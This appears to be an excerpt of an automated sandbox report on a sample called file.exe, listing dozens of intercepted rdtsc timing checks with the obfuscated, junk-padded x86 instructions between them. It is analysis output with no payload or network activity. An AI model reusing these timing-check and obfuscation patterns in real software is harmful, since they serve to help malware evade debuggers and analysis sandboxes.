                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F56AB6 second address: F56ABD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F56ABD second address: F56B62 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edi 0x0000000d call 00007F400072A728h 0x00000012 pop edi 0x00000013 mov dword ptr [esp+04h], edi 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc edi 0x00000020 push edi 0x00000021 ret 0x00000022 pop edi 0x00000023 ret 0x00000024 call 00007F400072A737h 0x00000029 mov ecx, dword ptr [ebp+122D1C12h] 0x0000002f pop edx 0x00000030 lea eax, dword ptr [ebp+124894F6h] 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F400072A728h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 and edx, 4F3B86D4h 0x00000056 mov ecx, dword ptr [ebp+122D24AAh] 0x0000005c nop 0x0000005d push edi 0x0000005e pushad 0x0000005f jmp 00007F400072A736h 0x00000064 jnp 00007F400072A726h 0x0000006a popad 0x0000006b pop edi 0x0000006c push eax 0x0000006d push ebx 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F56B62 second address: F56B66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F56B66 second address: F33CDA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F400072A726h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F400072A728h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000016h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 mov edi, 0720C495h 0x0000002b call dword ptr [ebp+122D2ED5h] 0x00000031 jmp 00007F400072A72Ch 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 pushad 0x0000003a popad 0x0000003b je 00007F400072A726h 0x00000041 jmp 00007F400072A731h 0x00000046 popad 0x00000047 jmp 00007F400072A730h 0x0000004c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8A732 second address: F8A738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8A893 second address: F8A89E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F400072A726h 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8A89E second address: F8A8A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8A8A4 second address: F8A8A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8A9E4 second address: F8A9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8A9E8 second address: F8A9F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007F400072A726h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8A9F6 second address: F8AA25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B76h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f pop eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push esi 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pushad 0x00000019 popad 0x0000001a pop esi 0x0000001b push edi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AA25 second address: F8AA4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400072A738h 0x00000009 pop edi 0x0000000a push esi 0x0000000b jl 00007F400072A726h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AFEE second address: F8AFF8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4000E20B66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AFF8 second address: F8AFFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8AFFE second address: F8B002 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8B002 second address: F8B018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F400072A72Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8B018 second address: F8B01C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F8B01C second address: F8B020 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F91798 second address: F9179C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9179C second address: F917A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F959C0 second address: F959C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F959C8 second address: F959CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F959CD second address: F959ED instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4000E20B68h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d je 00007F4000E20B66h 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jl 00007F4000E20B76h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f pop eax 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F95B4A second address: F95B71 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400072A736h 0x00000007 jmp 00007F400072A72Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F95B71 second address: F95B87 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Dh 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F95FF1 second address: F96021 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F400072A72Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F400072A73Bh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96021 second address: F9603A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4000E20B73h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9603A second address: F96062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F400072A738h 0x0000000f jnc 00007F400072A726h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96062 second address: F96066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96066 second address: F9606E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9606E second address: F9608A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F4000E20B66h 0x00000009 jnc 00007F4000E20B66h 0x0000000f push edi 0x00000010 pop edi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jl 00007F4000E20B66h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F96422 second address: F96427 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F965AC second address: F965C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4000E20B73h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9699D second address: F969CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 jmp 00007F400072A72Bh 0x0000000b jmp 00007F400072A72Ch 0x00000010 push edi 0x00000011 pop edi 0x00000012 popad 0x00000013 jl 00007F400072A744h 0x00000019 jc 00007F400072A72Ch 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F969CB second address: F969DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F4000E20B72h 0x0000000a js 00007F4000E20B66h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99E6F second address: F99EC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F400072A72Dh 0x00000008 push esi 0x00000009 pop esi 0x0000000a jns 00007F400072A726h 0x00000010 jmp 00007F400072A738h 0x00000015 popad 0x00000016 jbe 00007F400072A740h 0x0000001c jmp 00007F400072A730h 0x00000021 jmp 00007F400072A72Ah 0x00000026 pop edx 0x00000027 pop eax 0x00000028 pushad 0x00000029 push eax 0x0000002a push edx 0x0000002b push esi 0x0000002c pop esi 0x0000002d push eax 0x0000002e pop eax 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99EC9 second address: F99ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F99ECD second address: F99ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C295 second address: F9C299 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9C299 second address: F9C2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F400072A726h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F400072A726h 0x00000014 jl 00007F400072A726h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA16B1 second address: FA16B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA19A1 second address: FA19B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F400072A72Eh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA19B3 second address: FA19D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B72h 0x00000007 jng 00007F4000E20B66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA19D2 second address: FA19D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1BA2 second address: FA1BA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1BA8 second address: FA1BAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1CDF second address: FA1CF9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jbe 00007F4000E20B66h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jl 00007F4000E20B66h 0x00000014 je 00007F4000E20B66h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1CF9 second address: FA1CFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA1E4A second address: FA1E50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F10A7A second address: F10A89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F400072A730h 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA78D7 second address: FA78ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA78ED second address: FA78F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA78F3 second address: FA78F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA78F8 second address: FA7921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400072A736h 0x00000007 jp 00007F400072A728h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7921 second address: FA7926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7926 second address: FA792B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6AED second address: FA6AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6AF3 second address: FA6AFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6AFB second address: FA6B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jp 00007F4000E20B66h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6B0A second address: FA6B29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F400072A72Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F400072A726h 0x00000016 push edi 0x00000017 pop edi 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6B29 second address: FA6B44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4000E20B71h 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6B44 second address: FA6B54 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F400072A726h 0x00000008 jc 00007F400072A726h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6B54 second address: FA6B5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F4000E20B66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6B5E second address: FA6B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6B62 second address: FA6B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F4000E20B66h 0x00000010 js 00007F4000E20B66h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6D00 second address: FA6D05 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6D05 second address: FA6D0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA6EC5 second address: FA6ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnl 00007F400072A726h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7018 second address: FA7036 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4000E20B76h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA718B second address: FA7192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7334 second address: FA739C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4000E20B75h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F4000E20B79h 0x00000010 pop eax 0x00000011 pushad 0x00000012 push edi 0x00000013 jnl 00007F4000E20B66h 0x00000019 jmp 00007F4000E20B71h 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F4000E20B77h 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA739C second address: FA73BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400072A739h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB06EC second address: FB06F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0859 second address: FB087F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jmp 00007F400072A737h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB087F second address: FB089C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4000E20B77h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB089C second address: FB08A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB08A1 second address: FB08A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB08A7 second address: FB08AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB08AD second address: FB08B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0CE9 second address: FB0CFF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 pop eax 0x00000008 jnl 00007F400072A728h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB230D second address: FB2328 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4000E20B76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB2328 second address: FB232E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5607 second address: FB560B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB560B second address: FB5677 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F400072A72Eh 0x0000000b pushad 0x0000000c jmp 00007F400072A736h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 popad 0x00000014 push esi 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 jmp 00007F400072A736h 0x0000001c pop esi 0x0000001d popad 0x0000001e pushad 0x0000001f push ebx 0x00000020 pushad 0x00000021 popad 0x00000022 jmp 00007F400072A72Ch 0x00000027 pop ebx 0x00000028 jnp 00007F400072A72Eh 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 popad 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB590C second address: FB5922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4000E20B72h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5922 second address: FB593F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F400072A735h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB593F second address: FB5945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5945 second address: FB5957 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F400072A726h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5D59 second address: FB5D63 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4000E20B66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5EB6 second address: FB5EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F400072A72Eh 0x00000009 pop edi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FC37D0 second address: FC3812 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4000E20B6Ah 0x00000009 jmp 00007F4000E20B79h 0x0000000e popad 0x0000000f pushad 0x00000010 push eax 0x00000011 pop eax 0x00000012 jmp 00007F4000E20B73h 0x00000017 push eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
